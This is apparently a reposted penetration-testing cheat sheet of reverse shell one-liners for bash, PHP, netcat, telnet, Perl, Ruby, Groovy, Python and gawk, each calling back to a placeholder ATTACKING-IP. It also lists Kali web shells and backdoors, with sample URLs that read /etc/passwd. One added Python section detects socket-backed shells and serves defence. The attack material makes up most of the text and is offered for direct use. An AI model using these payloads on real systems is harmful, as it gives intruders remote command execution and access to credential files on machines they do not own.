Reverse Shell Cheat Sheet

Use Netcat to listen locally on a port the target's egress filtering is likely to allow, such as 80 or 443:

root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...

    Note: if the target that is to call back sits on a NAT-routed network that cannot reach your listener directly, you need a port forward to get the connection through, for example the Meterpreter portfwd command on a host you already control.

Bash Reverse Shells

# Duplicates stdin onto stdout and stderr; assumes fd 0 is already a connected socket
# (the original printed this line with its redirection characters stripped; this is the reconstructed form)
exec /bin/bash 0<&0 1>&0 2>&0
# Opens fd 196 read/write on a TCP connection, then hands it to sh as stdin, stdout and stderr
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
# Opens fd 5 on the connection and executes each received line; output goes back over the socket
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done

# or:

while read line 0<&5; do $line 2>&5 >&5; done
# Interactive bash with all three standard streams on the socket (bash only: /dev/tcp is a bash feature, not a kernel device)
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
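
Every one-liner above leaves the same artifact on the host: a shell process whose stdin, stdout and stderr all point at a socket instead of a terminal or pipe. The following is an added example, not part of the original cheat sheet, of a host-side check for that pattern. It is Linux only (it reads /proc), and the test subject is constructed locally with a socketpair so nothing connects out; the shell names and the /proc paths are the only assumptions it makes.

```python
# Added example (not from the original page): scan /proc for shell processes whose
# standard streams are sockets, the fd layout left by socket/dup2 and /dev/tcp reverse shells.
import os
import socket
import subprocess

# Assumed list of shell binaries worth flagging; extend for your environment.
SHELL_NAMES = ("sh", "bash", "dash", "zsh", "ksh", "ash")


def stdio_targets(pid):
    """Return what fds 0, 1 and 2 of `pid` point at, e.g. 'socket:[12345]' or '/dev/pts/0';
    None if the process vanished or is not ours to inspect."""
    try:
        return [os.readlink(f"/proc/{pid}/fd/{fd}") for fd in (0, 1, 2)]
    except OSError:
        return None


def socket_backed_stdio(pid):
    """True when all three standard streams of `pid` are sockets: the layout produced by
    os.dup2(s.fileno(), 0/1/2), or by 'exec 5<>/dev/tcp/...; sh <&5 >&5 2>&5'."""
    targets = stdio_targets(pid)
    return bool(targets) and all(t.startswith("socket:") for t in targets)


def process_name(pid):
    """The kernel's short name for the process (basename of the exec'd path)."""
    try:
        with open(f"/proc/{pid}/comm") as f:
            return f.read().strip()
    except OSError:
        return ""


def find_socket_shells(names=SHELL_NAMES):
    """Scan /proc for shells with socket-backed standard streams.
    Returns a list of (pid, name, [fd0, fd1, fd2]) tuples."""
    hits = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        name = process_name(pid)
        if name in names and socket_backed_stdio(pid):
            hits.append((pid, name, stdio_targets(pid)))
    return hits


def spawn_local_subject():
    """Constructed test subject: /bin/sh wired to one end of a socketpair, which is exactly
    how a reverse shell looks to the kernel, minus the remote peer."""
    ours, theirs = socket.socketpair()
    proc = subprocess.Popen(["/bin/sh"], stdin=theirs.fileno(),
                            stdout=theirs.fileno(), stderr=theirs.fileno())
    theirs.close()  # the child holds its own copies on fds 0, 1 and 2
    return proc, ours


def demo():
    """Spawn the subject, run the scan, tear the subject down; True if the scan caught it."""
    proc, sock = spawn_local_subject()
    try:
        return any(pid == proc.pid for pid, _name, _fds in find_socket_shells())
    finally:
        sock.sendall(b"exit\n")
        sock.close()
        proc.wait(timeout=10)


if __name__ == "__main__":
    for pid, name, fds in find_socket_shells():
        print(pid, name, fds)
```

readlink reports `socket:[inode]` for AF_UNIX sockets too, so inetd-style or socket-activated services can show up as well; to confirm a hit is a TCP connection, look the inode up in /proc/net/tcp (and tcp6) and check the remote address.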

PHP Reverse Shell

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
# Assumes the socket became file descriptor 3 (0-2 are the standard streams). If it does not work, try 4, 5 or 6: the number depends on how many files the PHP process already has open.

Netcat Reverse Shell

# Needs a netcat built with -e (the GAPING_SECURITY_HOLE build option, or ncat --exec); many distributions ship netcat without it
nc -e /bin/sh ATTACKING-IP 80
# Output only: the shell still reads commands from its own stdin, so nothing typed at the listener reaches it
/bin/sh | nc ATTACKING-IP 80
# Without -e: a named pipe carries the listener's input back into the shell (the original printed this line with its '<' and '|' stripped)
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 80 0</tmp/p | /bin/sh 1>/tmp/p

Telnet Reverse Shell

# Same named-pipe trick with telnet as the transport (the original printed this line with its '<' and '|' stripped)
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/sh 1>/tmp/p
# Two connections: commands arrive on port 80, output goes back on port 443, so listen on both
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

// Groovy syntax (e.g. a Jenkins script console), not plain Java: in Java write the three strings
// as a String[] literal and drop the backslash before $line (\$ is an invalid escape in Java)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk Reverse Shell

#!/usr/bin/gawk -f
# Note: despite the heading this is a bind shell, not a reverse shell: it listens on Port on the
# target (gawk's /inet/tcp/PORT/0/0 special file) and you connect to it with nc TARGET 8080
BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                # run the received line as a coprocess and relay its output
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }}

Kali Web Shells

Kali PHP Web Shells

/usr/share/webshells/php/php-reverse-shell.php Pen Test Monkey - PHP Reverse Shell

/usr/share/webshells/php/php-findsock-shell.php

/usr/share/webshells/php/findsock.c

Pen Test Monkey, Findsock Shell. 

Build with gcc -o findsock findsock.c (be mindful of the target server's architecture); connect with netcat rather than a browser, since the shell reuses the existing connection: nc -v target 80

/usr/share/webshells/php/simple-backdoor.php

PHP backdoor, useful for command execution if file upload or code injection is possible.

 Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

/usr/share/webshells/php/php-backdoor.php Larger PHP shell, with a text input box for command execution.

Kali Perl Reverse Shell

/usr/share/webshells/perl/perl-reverse-shell.pl Pen Test Monkey - Perl Reverse Shell

/usr/share/webshells/perl/perlcmd.cgi

Pen Test Monkey, Perl Shell.

 Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali ColdFusion Shell

/usr/share/webshells/cfm/cfexec.cfm ColdFusion Shell - aka CFM Shell

Kali ASP Shell

/usr/share/webshells/asp/ Kali ASP Shells

Kali ASPX Shells

/usr/share/webshells/aspx/ Kali ASPX Shells

Kali JSP Reverse Shell

/usr/share/webshells/jsp/jsp-reverse.jsp Kali JSP Reverse Shell

Original article: https://highon.coffee/blog/reverse-shell-cheat-sheet/

Other articles on reverse shells and port forwarding:

     Penetration testing: notes on reverse shells and forwarding - Reverse Shell During the Penetration Test: http://le4f.net/post/post/reverse-shell-during-the-penetration-test


Both bloggers' sites have more worthwhile material; reading them can only help.
